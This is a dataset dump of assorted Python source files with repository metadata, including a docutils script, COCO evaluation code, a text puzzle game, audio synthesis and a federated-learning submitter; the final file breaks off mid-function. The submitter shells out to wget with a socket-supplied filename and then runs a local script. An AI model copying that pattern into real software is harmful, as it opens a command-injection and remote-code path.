blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0519b9a6c3d736fd51361e9def7cf66c291409c5
|
915ac708aeac53125f29bef90c2c047eaed4940e
|
/Anaconda/Scripts/rst2xetex.py
|
2d9179a588e56dbef11208ccd0ed3621286f9cc3
|
[] |
no_license
|
bopopescu/newGitTest
|
c8c480ddd585ef416a5ccb63cbc43e3019f92534
|
5a19f7d01d417a34170a8f760a76e6a8bb7c9274
|
refs/heads/master
| 2021-05-31T17:00:26.656450 | 2016-06-08T06:43:52 | 2016-06-08T06:43:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 795 |
py
|
#!C:\aroot\stage\python.exe
# $Id: rst2xetex.py 7038 2011-05-19 09:12:02Z milde $
# Author: Guenter Milde
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing XeLaTeX source code.
"""
try:
    # Pick up the user's locale so Docutils produces locale-aware output;
    # failure here is non-fatal, the default "C" locale is used instead.
    import locale
    locale.setlocale(locale.LC_ALL, '')
except Exception:  # was a bare `except:` — don't swallow SystemExit/KeyboardInterrupt
    pass

from docutils.core import publish_cmdline

# Help text shown by the command-line front end (--help).
description = ('Generates XeLaTeX documents from standalone reStructuredText '
               'sources. '
               'Reads from <source> (default is stdin) and writes to '
               '<destination> (default is stdout). See '
               '<http://docutils.sourceforge.net/docs/user/latex.html> for '
               'the full reference.')

# Parse sys.argv and run the Docutils publisher with the XeTeX writer.
publish_cmdline(writer_name='xetex', description=description)
|
[
"[email protected]"
] | |
48f6fab3b18bb1659f37d45e12c7ea01398ed32a
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_bunts.py
|
41d450a12d291732d8830616446e29d1957fe2d2
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 214 |
py
|
# class header (sic: original comment read "calss header"; generated word-base stub)
# NOTE(review): instantiating this class raises NameError because `bunt` below
# is not defined anywhere in this module — presumably the code generator meant
# to emit definition text here; confirm against the generator before fixing.
class _BUNTS():
    def __init__(self,):
        # Metadata for the word-base entry "BUNTS".
        self.name = "BUNTS"
        self.definitions = bunt  # BUG: `bunt` is undefined (NameError at runtime)
        self.parents = []
        self.childen = []  # sic: generator typo for "children"; kept for compatibility
        self.properties = []
        self.jsondata = {}
        self.basic = ['bunt']  # base (uninflected) form of the word
|
[
"[email protected]"
] | |
e662722fad68cff102487d6ba08454d41807ad11
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/dev/cv/detection/YOLOX_Dynamic_ID4069_for_PyTorch/yolox/layers/fast_coco_eval_api.py
|
55bfa28a1c06813d48ff90862908a7655239001e
|
[
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 |
Apache-2.0
| 2022-10-15T09:29:12 | 2022-04-20T04:11:18 |
Python
|
UTF-8
|
Python
| false | false | 6,464 |
py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# This file comes from
# https://github.com/facebookresearch/detectron2/blob/master/detectron2/evaluation/fast_eval_api.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# Copyright (c) Megvii Inc. All rights reserved.
import copy
import time
import numpy as np
from pycocotools.cocoeval import COCOeval
from .jit_ops import FastCOCOEvalOp
class COCOeval_opt(COCOeval):
    """
    This is a slightly modified version of the original COCO API, where the functions evaluateImg()
    and accumulate() are implemented in C++ to speedup evaluation
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Compiled extension exposing the fast evaluate/accumulate kernels.
        self.module = FastCOCOEvalOp().load()

    def evaluate(self):
        """
        Run per image evaluation on given images and store results in self.evalImgs_cpp, a
        datastructure that isn't readable from Python but is used by a c++ implementation of
        accumulate(). Unlike the original COCO PythonAPI, we don't populate the datastructure
        self.evalImgs because this datastructure is a computational bottleneck.
        :return: None
        """
        tic = time.time()
        print("Running per image evaluation...")
        p = self.params
        # add backward compatibility if useSegm is specified in params
        if p.useSegm is not None:
            p.iouType = "segm" if p.useSegm == 1 else "bbox"
            print(
                "useSegm (deprecated) is not None. Running {} evaluation".format(
                    p.iouType
                )
            )
        print("Evaluate annotation type *{}*".format(p.iouType))
        # De-duplicate and normalize the image/category id lists.
        p.imgIds = list(np.unique(p.imgIds))
        if p.useCats:
            p.catIds = list(np.unique(p.catIds))
        p.maxDets = sorted(p.maxDets)
        self.params = p
        # Inherited COCOeval setup; self._gts / self._dts are read below
        # (presumably populated here — see pycocotools.cocoeval).
        self._prepare()
        # loop through images, area range, max detection number
        catIds = p.catIds if p.useCats else [-1]
        # Select the IoU routine for the annotation type.
        if p.iouType == "segm" or p.iouType == "bbox":
            computeIoU = self.computeIoU
        elif p.iouType == "keypoints":
            computeIoU = self.computeOks
        self.ious = {
            (imgId, catId): computeIoU(imgId, catId)
            for imgId in p.imgIds
            for catId in catIds
        }
        maxDet = p.maxDets[-1]

        # <<<< Beginning of code differences with original COCO API
        def convert_instances_to_cpp(instances, is_det=False):
            # Convert annotations for a list of instances in an image to a format that's fast
            # to access in C++
            instances_cpp = []
            for instance in instances:
                instance_cpp = self.module.InstanceAnnotation(
                    int(instance["id"]),
                    instance["score"] if is_det else instance.get("score", 0.0),
                    instance["area"],
                    bool(instance.get("iscrowd", 0)),
                    bool(instance.get("ignore", 0)),
                )
                instances_cpp.append(instance_cpp)
            return instances_cpp

        # Convert GT annotations, detections, and IOUs to a format that's fast to access in C++
        ground_truth_instances = [
            [convert_instances_to_cpp(self._gts[imgId, catId]) for catId in p.catIds]
            for imgId in p.imgIds
        ]
        detected_instances = [
            [
                convert_instances_to_cpp(self._dts[imgId, catId], is_det=True)
                for catId in p.catIds
            ]
            for imgId in p.imgIds
        ]
        ious = [[self.ious[imgId, catId] for catId in catIds] for imgId in p.imgIds]
        if not p.useCats:
            # For each image, flatten per-category lists into a single list
            ground_truth_instances = [
                [[o for c in i for o in c]] for i in ground_truth_instances
            ]
            detected_instances = [
                [[o for c in i for o in c]] for i in detected_instances
            ]
        # Call C++ implementation of self.evaluateImgs()
        self._evalImgs_cpp = self.module.COCOevalEvaluateImages(
            p.areaRng,
            maxDet,
            p.iouThrs,
            ious,
            ground_truth_instances,
            detected_instances,
        )
        # Deliberately left unset: the Python-side structure is the bottleneck
        # this class avoids (see docstring).
        self._evalImgs = None
        self._paramsEval = copy.deepcopy(self.params)
        toc = time.time()
        print("COCOeval_opt.evaluate() finished in {:0.2f} seconds.".format(toc - tic))
        # >>>> End of code differences with original COCO API

    def accumulate(self):
        """
        Accumulate per image evaluation results and store the result in self.eval. Does not
        support changing parameter settings from those used by self.evaluate()
        """
        print("Accumulating evaluation results...")
        tic = time.time()
        if not hasattr(self, "_evalImgs_cpp"):
            # NOTE(review): execution still falls through to the next line and
            # fails with AttributeError; presumably this should raise/return.
            print("Please run evaluate() first")
        self.eval = self.module.COCOevalAccumulate(self._paramsEval, self._evalImgs_cpp)
        # recall is num_iou_thresholds X num_categories X num_area_ranges X num_max_detections
        self.eval["recall"] = np.array(self.eval["recall"]).reshape(
            self.eval["counts"][:1] + self.eval["counts"][2:]
        )
        # precision and scores are num_iou_thresholds X num_recall_thresholds X num_categories X
        # num_area_ranges X num_max_detections
        self.eval["precision"] = np.array(self.eval["precision"]).reshape(
            self.eval["counts"]
        )
        self.eval["scores"] = np.array(self.eval["scores"]).reshape(self.eval["counts"])
        toc = time.time()
        print(
            "COCOeval_opt.accumulate() finished in {:0.2f} seconds.".format(toc - tic)
        )
|
[
"[email protected]"
] | |
fe484f2dbfa7363e12c93e00a34759692e113a73
|
f4b8c90c1349c8740c1805f7b6b0e15eb5db7f41
|
/test/test_term_session_item.py
|
7867f29a7aa4a6fd2bb993565b40f161db7abf86
|
[] |
no_license
|
CalPolyResDev/StarRezAPI
|
012fb8351159f96a81352d6c7bfa36cd2d7df13c
|
b184e1863c37ff4fcf7a05509ad8ea8ba825b367
|
refs/heads/master
| 2021-01-25T10:29:37.966602 | 2018-03-15T01:01:35 | 2018-03-15T01:01:35 | 123,355,501 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,044 |
py
|
# coding: utf-8
"""
StarRez API
This is a way to connect with the StarRez API. We are not the developers of the StarRez API, we are just an organization that uses it and wanted a better way to connect to it. # noqa: E501
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import starrez_client
from starrez_client.models.term_session_item import TermSessionItem # noqa: E501
from starrez_client.rest import ApiException
class TestTermSessionItem(unittest.TestCase):
    """Unit test stubs for the TermSessionItem model (swagger-codegen generated)."""

    def setUp(self):
        """No fixtures are required for these stubs."""

    def tearDown(self):
        """Nothing to clean up."""

    def testTermSessionItem(self):
        """Test TermSessionItem"""
        # FIXME: construct object with mandatory attributes with example values
        # model = starrez_client.models.term_session_item.TermSessionItem() # noqa: E501
# Allow running this test module directly (outside a test runner).
if __name__ == '__main__':
    unittest.main()
|
[
"[email protected]"
] | |
415935edef31996e2b359804e324f5f7b3d48614
|
ab9b75fcdd2b7352968886e5ed41ee7788216226
|
/src/gamesbyexample/stickyhands.py
|
a1af5601756ea83263f3a20e8dd2bb26220102ac
|
[
"MIT"
] |
permissive
|
mgocken/PythonStdioGames
|
d7b48cafbc33a027548cab08ad08aea6c0c81abd
|
036d2f142581fb74a38400721aecce15a695e1bc
|
refs/heads/master
| 2020-09-29T18:35:34.589307 | 2019-12-06T00:15:46 | 2019-12-06T00:15:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,528 |
py
|
# Sticky Hands, by Al Sweigart [email protected]
# A jewel-stealing, movement puzzle game.
__version__ = 1
# Inspired by Herding Cats https://w.itch.io/herding-cats
# TODO - Enter R to reset the entire level.
import copy, os, sys

# Setup the constants:
WALL = chr(9608)     # solid block character drawn for walls
FACE = chr(9786)     # the player's face
DIAMOND = chr(9830)  # the jewels the player collects
# Map characters used in the level file to the characters drawn on screen.
CHAR_MAP = {'#': WALL, '@': FACE, '$': DIAMOND, ' ': ' '}

# Display the title banner and instructions:
print('''Sticky Hands: A diamond collecting game.
By Al Sweigart [email protected]
Pick up diamonds by standing next to them. Stuck diamonds also
become sticky. Try to stick every diamond in the level.
Enter WASD letters to move, numbers to switch levels, U to undo a
move, or "quit" to quit the game. You can enter multiple WASD or U
letters to make several moves at once.
''')
# Load each level from stickyhandslevels.txt
if not os.path.exists('stickyhandslevels.txt'):
    print('Download the level file from https://github.com/asweigart/PythonStdioGames/blob/master/src/stickyhandslevels.txt')
    sys.exit()
ALL_LEVELS = []
with open('stickyhandslevels.txt') as levelFile:
    # Each level is represented by a dictionary: the keys 'width', 'height'
    # and 'diamonds' hold level metadata, and each (x, y) tuple key maps to
    # the level-file character at that position.
    currentLevelFromFile = {'width': 0, 'height': 0, 'diamonds': 0}
    y = 0  # current row within the level being read
    for line in levelFile.readlines():
        if line.startswith(';'):
            continue # Ignore comments in the level file.
        if line == '\n':
            # A blank line separates levels in the file.
            if currentLevelFromFile == {'width': 0, 'height': 0, 'diamonds': 0}:
                continue # Ignore this line, and continue to the next line.
            # Finished with the current level:
            ALL_LEVELS.append(currentLevelFromFile)
            currentLevelFromFile = {'width': 0, 'height': 0, 'diamonds': 0}
            y = 0 # Reset y back to 0.
            continue
        # Add the line to the current level.
        # We use line[:-1] so we don't include the newline:
        for x, levelChar in enumerate(line[:-1]):
            currentLevelFromFile[(x, y)] = levelChar
            # Keep track of how many diamonds are in the level:
            if levelChar == '$':
                currentLevelFromFile['diamonds'] += 1
        y += 1
        # Track the widest row and tallest column seen so far:
        if len(line) - 1 > currentLevelFromFile['width']:
            currentLevelFromFile['width'] = len(line) - 1
        if y > currentLevelFromFile['height']:
            currentLevelFromFile['height'] = y
def drawLevel(levelNum, levelData):
    """Print the level header line, then render levelData row by row."""
    print('Level #' + str(levelNum + 1), 'of', len(ALL_LEVELS))
    for row in range(levelData['height']):
        # Translate each map cell through CHAR_MAP; missing cells render as spaces.
        rendered = ''.join(
            CHAR_MAP[levelData.get((col, row), ' ')]
            for col in range(levelData['width'])
        )
        print(rendered)
def getPlayerBlobPoints(levelData, playerx, playery):
    """Return the list of points making up the player's sticky blob.

    The blob is the player's position plus every diamond ('$') reachable
    from it through chains of orthogonally-adjacent diamonds (a flood fill).

    Fixes over the original implementation:
    * neighbor cells are probed with levelData.get(), so checking a point
      outside the level no longer raises KeyError;
    * membership is tracked with a set, so a diamond adjacent to two blob
      cells is appended only once (duplicates inflated len(playerBlob),
      which the level-solved check compares against the diamond count);
    * the set also replaces O(n) list membership tests.
    """
    playerBlob = [(playerx, playery)]
    inBlob = {(playerx, playery)}        # every point already in the blob
    pointsToCheck = [(playerx, playery)]
    while pointsToCheck:
        x, y = pointsToCheck.pop()
        # Probe the four orthogonal neighbors for sticky diamonds.
        for neighbor in ((x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)):
            if neighbor not in inBlob and levelData.get(neighbor) == '$':
                inBlob.add(neighbor)
                playerBlob.append(neighbor)
                pointsToCheck.append(neighbor)
    return playerBlob
# Start on the first level; keep a private copy so edits don't touch ALL_LEVELS,
# and seed the undo history with the starting state.
currentLevelNumber = 0
currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
undoStack = [copy.copy(currentLevel)]
while True: # Main game loop.
    drawLevel(currentLevelNumber, currentLevel)
    # Get the input from the player:
    moves = input('Enter moves> ').upper()
    if moves == 'QUIT':
        print('Thanks for playing!')
        sys.exit()
    if moves.isdecimal():
        # A number switches to that level.
        if not (1 <= int(moves) < len(ALL_LEVELS)):
            print('Enter a level number between 1 and', len(ALL_LEVELS))
            continue
        # Change the current level:
        currentLevelNumber = int(moves) - 1
        currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
        undoStack = [copy.copy(currentLevel)]
        continue
    # Validate the input; make sure it only has W, A, S, D, or U:
    movesAreValid = True
    for move in moves:
        if move not in ('W', 'A', 'S', 'D', 'U'):
            movesAreValid = False
            print(move, 'is not a valid move.')
            break
    if not movesAreValid:
        continue
    # Carry out the moves:
    for move in moves:
        # Find the player position:
        for position, character in currentLevel.items():
            if character == '@':
                playerx, playery = position
        if move == 'U':
            if len(undoStack) == 1:
                continue # Can't undo past the first move.
            undoStack.pop() # Remove the last item from the undoStack list.
            currentLevel = copy.copy(undoStack[-1])
            continue
        # Translate the WASD key into a movement delta:
        if move == 'W':
            movex, movey = 0, -1
        elif move == 'A':
            movex, movey = -1, 0
        elif move == 'S':
            movex, movey = 0, 1
        elif move == 'D':
            movex, movey = 1, 0
        playerBlob = getPlayerBlobPoints(currentLevel, playerx, playery)
        # The whole blob moves together, or not at all:
        blobCanMove = True
        for blobPoint in playerBlob:
            blobx, bloby = blobPoint[0], blobPoint[1]
            moveToSpace = currentLevel.get((blobx + movex, bloby + movey), ' ')
            # If the move-to space is a wall, don't move at all:
            if moveToSpace == '#':
                blobCanMove = False
                break
        if blobCanMove:
            # Erase the blob from its old cells, remembering where each piece goes:
            newBlobPoints = []
            for blobPoint in playerBlob:
                blobx, bloby = blobPoint[0], blobPoint[1]
                # If the move-to space is empty or a goal, just move there:
                if currentLevel[(blobx, bloby)] == '@':
                    currentLevel[(blobx, bloby)] = ' '
                    newBlobPoints.append((blobx + movex, bloby + movey, '@'))
                elif currentLevel[(blobx, bloby)] == '$':
                    currentLevel[(blobx, bloby)] = ' '
                    newBlobPoints.append((blobx + movex, bloby + movey, '$'))
            for newBlobPoint in newBlobPoints:
                # Set the player's new position:
                currentLevel[(newBlobPoint[0], newBlobPoint[1])] = newBlobPoint[2] # TODO - refactor this.
        # Save the state of the level for the undo feature:
        undoStack.append(copy.copy(currentLevel))
        # Check if the player has finished the level:
        levelIsSolved = False
        playerBlob = getPlayerBlobPoints(currentLevel, playerx + movex, playery + movey)
        # The blob holds the player plus collected diamonds, hence the -1:
        if len(playerBlob) - 1 == currentLevel['diamonds']:
            levelIsSolved = True
        if levelIsSolved:
            drawLevel(currentLevelNumber, currentLevel)
            print('Level complete!')
            input('Press Enter to continue...')
            # Advance to the next level (wrapping around at the end):
            currentLevelNumber = (currentLevelNumber + 1) % len(ALL_LEVELS)
            currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
            undoStack = [copy.copy(currentLevel)]
            break # Don't carry out any remaining moves.
|
[
"[email protected]"
] | |
02e1b1ac9d7ca0fcf0fa59318c57df5d46403f9d
|
16809bf25066488f2f32f154dadef3e30c68ae68
|
/sine_wave.py
|
0ed35aeb1f8d136868fdb4c3053a10605cc1bcdf
|
[] |
no_license
|
aidiary/signal_processing
|
0db6d1a9662ccd0fe232ccc461e9b27174c8ef88
|
4c1cb8ceee3a1527f38b8dbf9ffa1a737d06b577
|
refs/heads/master
| 2021-01-13T03:44:32.721301 | 2016-12-23T13:40:10 | 2016-12-23T13:40:10 | 77,221,395 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,762 |
py
|
#coding: utf-8
import wave
import struct
import numpy as np
from pylab import *
def createSineWave (A, f0, fs, length):
    """Create and return a sine wave as packed 16-bit signed PCM bytes.

    A      -- amplitude in [0.0, 1.0]
    f0     -- fundamental frequency [Hz]
    fs     -- sampling frequency [Hz]
    length -- duration in seconds
    """
    data = []
    # Build the waveform as floats in [-1.0, 1.0].
    # (Fixed: previously used pylab's star-imported `arange` for a plain
    # integer range; the builtin range avoids the wildcard dependency.)
    for n in range(int(length * fs)):  # n is the sample index
        s = A * np.sin(2 * np.pi * f0 * n / fs)
        # Clip samples that exceed full scale.
        if s > 1.0: s = 1.0
        if s < -1.0: s = -1.0
        data.append(s)
    # Convert to integers in [-32768, 32767].
    data = [int(x * 32767.0) for x in data]
    # plot(data[0:100]); show()
    # Pack into binary; the list is star-expanded into pack() arguments.
    data = struct.pack("h" * len(data), *data)
    return data
def play (data, fs, bit):
    """Play packed 16-bit mono PCM `data` at rate `fs` on the default audio device.

    `bit` is accepted for interface compatibility but the stream format is
    fixed to 16-bit (paInt16).
    """
    import pyaudio
    # Open an output stream.
    p = pyaudio.PyAudio()
    stream = p.open(format=pyaudio.paInt16,
                    channels=1,
                    rate=int(fs),
                    output= True)
    # Write the data to the stream chunk by chunk.
    chunk = 1024
    sp = 0  # playback position pointer
    buf = data[sp:sp+chunk]
    # Fixed: was `while buffer != '':`, which never terminates when `data`
    # is bytes (py3) since b'' != '' is always True; truthiness works for
    # both str (py2) and bytes (py3), and `buf` no longer shadows a builtin.
    while buf:
        stream.write(buf)
        sp = sp + chunk
        buf = data[sp:sp+chunk]
    stream.close()
    p.terminate()
def save(data, fs, bit, filename):
    """Write packed PCM waveform data to a WAVE file.

    data     -- packed binary samples (as produced by createSineWave)
    fs       -- sampling frequency [Hz]
    bit      -- bits per sample (must be a multiple of 8)
    filename -- output path
    """
    wf = wave.open(filename, "w")
    wf.setnchannels(1)  # mono
    # Fixed: `bit / 8` is float true-division on Python 3 and setsampwidth
    # requires an int; floor division is correct on both 2 and 3.
    wf.setsampwidth(bit // 8)
    wf.setframerate(fs)
    wf.writeframes(data)
    wf.close()
# Demo: generate a 0.25-amplitude, 250 Hz, 1-second tone sampled at 8 kHz,
# play it through the audio device, then write it to sine.wav.
if __name__ == "__main__" :
    data = createSineWave(0.25, 250, 8000.0, 1.0)
    play(data, 8000, 16)
    save(data, 8000, 16, "sine.wav")
|
[
"[email protected]"
] | |
deb27eae24f4cd46475211751438e904854e037a
|
fcdfe976c9ed60b18def889692a17dc18a8dd6d7
|
/ros/py_ros/kdl_test2.py
|
120f3dc29d4eeaee751accf468dd08397df344f3
|
[] |
no_license
|
akihikoy/ay_test
|
4907470889c9bda11cdc84e8231ef3156fda8bd7
|
a24dfb720960bfedb94be3b4d147e37616e7f39a
|
refs/heads/master
| 2023-09-02T19:24:47.832392 | 2023-08-27T06:45:20 | 2023-08-27T06:45:20 | 181,903,332 | 6 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,517 |
py
|
#!/usr/bin/python
#\file kdl_test2.py
#\brief certain python script
#\author Akihiko Yamaguchi, [email protected]
#\version 0.1
import numpy as np
from kdl_kin import TKinematics
if __name__=='__main__':
np.set_printoptions(precision=3)
print 'Testing TKinematics (robot_description == Yaskawa Motoman is assumed).'
print 'Before executing this script, run:'
print ' rosparam load `rospack find motoman_sia10f_support`/urdf/sia10f.urdf robot_description'
kin= TKinematics(end_link='link_t')
kin.print_robot_description()
DoF= len(kin.joint_names)
q0= [0.0]*DoF
angles= {joint:q0[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x0= kin.forward_position_kinematics(angles)
print 'q1=',np.array(q1)
print 'x0= FK(q0)=',x0
import random
q1= [3.0*(random.random()-0.5) for j in range(DoF)]
angles= {joint:q1[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x1= kin.forward_position_kinematics(angles)
print 'q1=',q1
print 'x1= FK(q1)=',x1
seed= [0.0]*DoF
#seed= [3.0*(random.random()-0.5) for j in range(DoF)]
q2= kin.inverse_kinematics(x1[:3], x1[3:], seed=seed, maxiter=2000, eps=1.0e-4) #, maxiter=500, eps=1.0e-6
print 'q2= IK(x1)=',q2
if q2 is not None:
angles= {joint:q2[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x2= kin.forward_position_kinematics(angles)
print 'x2= FK(q2)=',x2
print 'x2==x1?', np.allclose(x2,x1)
print '|x2-x1|=',np.linalg.norm(x2-x1)
else:
print 'Failed to solve IK.'
|
[
"[email protected]"
] | |
862323cdd250fded22470d58b5b961390e8c4680
|
88748ec85d537e4b50ba45a255a0dcc3c154116f
|
/tests/unit/test_poll.py
|
2810d41f352a9741f36504ab9e9b2f71976b5c96
|
[
"MIT"
] |
permissive
|
byrgazov/vanilla
|
17c53843b1b2f6b5484e4ff8e2fab54123245cc0
|
2896ae049d9e58ef3b4008a869ebf481951d0780
|
refs/heads/master
| 2020-07-30T12:30:04.497223 | 2020-07-24T10:08:03 | 2020-07-24T10:08:03 | 210,235,284 | 0 | 0 |
MIT
| 2019-09-23T00:49:06 | 2019-09-23T00:49:06 | null |
UTF-8
|
Python
| false | false | 1,731 |
py
|
import os
import vanilla.poll
class TestPoll(object):
    # NOTE(review): os.write/os.read are used with str payloads, so this suite
    # targets Python 2; on Python 3 those calls would need bytes.

    def test_poll(self):
        """Readable-event behavior of Poll.poll() on a pipe (events clear after
        being reported and re-arm on each new write)."""
        poll = vanilla.poll.Poll()
        r, w = os.pipe()
        poll.register(r, vanilla.poll.POLLIN)
        # Nothing written yet: no events.
        assert poll.poll(timeout=0) == []
        os.write(w, '1')
        assert poll.poll() == [(r, vanilla.poll.POLLIN)]
        # test event is cleared
        assert poll.poll(timeout=0) == []
        # test event is reset on new write after read
        assert os.read(r, 4096) == '1'
        assert poll.poll(timeout=0) == []
        os.write(w, '2')
        assert poll.poll() == [(r, vanilla.poll.POLLIN)]
        assert poll.poll(timeout=0) == []
        # test event is reset on new write without read
        os.write(w, '3')
        assert poll.poll() == [(r, vanilla.poll.POLLIN)]
        assert poll.poll(timeout=0) == []
        assert os.read(r, 4096) == '23'

    def test_write_close(self):
        """Closing the write end surfaces POLLERR on the registered read end."""
        poll = vanilla.poll.Poll()
        r, w = os.pipe()
        poll.register(r, vanilla.poll.POLLIN)
        poll.register(w, vanilla.poll.POLLOUT)
        # The write end is immediately writable.
        assert poll.poll() == [(w, vanilla.poll.POLLOUT)]
        assert poll.poll(timeout=0) == []
        os.close(w)
        assert poll.poll() == [(r, vanilla.poll.POLLERR)]
        assert poll.poll(timeout=0) == []

    def test_read_close(self):
        """Closing the read end surfaces POLLERR on the registered write end."""
        poll = vanilla.poll.Poll()
        r, w = os.pipe()
        poll.register(r, vanilla.poll.POLLIN)
        poll.register(w, vanilla.poll.POLLOUT)
        assert poll.poll() == [(w, vanilla.poll.POLLOUT)]
        assert poll.poll(timeout=0) == []
        os.close(r)
        # Both the pending POLLOUT and the error are reported together.
        got = poll.poll()
        assert got == [(w, vanilla.poll.POLLOUT), (w, vanilla.poll.POLLERR)]
        assert poll.poll(timeout=0) == []
|
[
"[email protected]"
] | |
c008d92d5264518d006a4ff9b43acef4f19e4c38
|
30b004cad2c14b47b5f66c3a4a0015e05ca4a27e
|
/contrib/data_safety_training/image_classification/submitter.py
|
920b60ad8fed2d7ff0b13d17001d8227f3b0abb8
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleFL
|
66c26f774eeadc25c12e74056ac389e0c1f61b84
|
dcc00c5dff62c3dd0092801f4e9b89d8c0957d3d
|
refs/heads/master
| 2023-08-07T22:05:24.806573 | 2023-03-21T01:15:10 | 2023-03-21T01:15:10 | 210,873,203 | 486 | 136 |
Apache-2.0
| 2023-07-26T22:30:57 | 2019-09-25T15:01:39 |
Python
|
UTF-8
|
Python
| false | false | 1,090 |
py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import zmq
import socket
import msgpack
import os
# Mission metadata announced to the data-safety server: the task name and the
# CHW image shape of the inputs.
mission_dict = {"mission": "image classification", "image_size": [3, 32, 32]}
#send request
context = zmq.Context()
zmq_socket = context.socket(zmq.REQ)
zmq_socket.connect("tcp://127.0.0.1:60001")
zmq_socket.send(msgpack.dumps(mission_dict))
#get and download encoder
file = zmq_socket.recv()
# NOTE(review): `file` arrives from the network and is interpolated straight
# into a shell command — command-injection risk; confirm the server is trusted.
os.system("wget 127.0.0.1:8080/{}".format(file))
#data encoding: run the downloaded encoder over the local data set
os.system("python -u user.py > user.log")
# NOTE(review): sending a str works on Python 2; pyzmq on Python 3 needs bytes.
zmq_socket.send("complete")
|
[
"[email protected]"
] | |
a31688d8579cfce253b6dac4f680333340f6b0e4
|
0bde5f7f09aa537ed1f4828d4e5ebee66475918f
|
/h2o-py/tests/testdir_sklearn/pyunit_sklearn_params.py
|
2a70a91baafd68393e95b43969166ffea1f8a2ea
|
[
"Apache-2.0"
] |
permissive
|
Winfredemalx54/h2o-3
|
d69f1c07e1f5d2540cb0ce5e6073415fa0780d32
|
dfb163c82ff3bfa6f88cdf02465a9bb4c8189cb7
|
refs/heads/master
| 2022-12-14T08:59:04.109986 | 2020-09-23T08:36:59 | 2020-09-23T08:36:59 | 297,947,978 | 2 | 0 |
Apache-2.0
| 2020-09-23T11:28:54 | 2020-09-23T11:28:54 | null |
UTF-8
|
Python
| false | false | 7,702 |
py
|
from __future__ import print_function
import os, sys
from sklearn.pipeline import Pipeline
from h2o.sklearn import H2OAutoMLEstimator, H2OGradientBoostingEstimator, H2OScaler, H2OPCA
# Make the shared test helpers (tests/pyunit_utils) importable from this test dir.
sys.path.insert(1, os.path.join("..",".."))
from tests import pyunit_utils
# Fixed seed shared by every estimator configuration in these tests.
seed = 2019
def test_all_params_are_visible_in_get_params():
    """Constructor params — including unset defaults — all appear in sklearn's get_params()."""
    pipeline = Pipeline([
        ('standardize', H2OScaler(center=True, scale=False)),
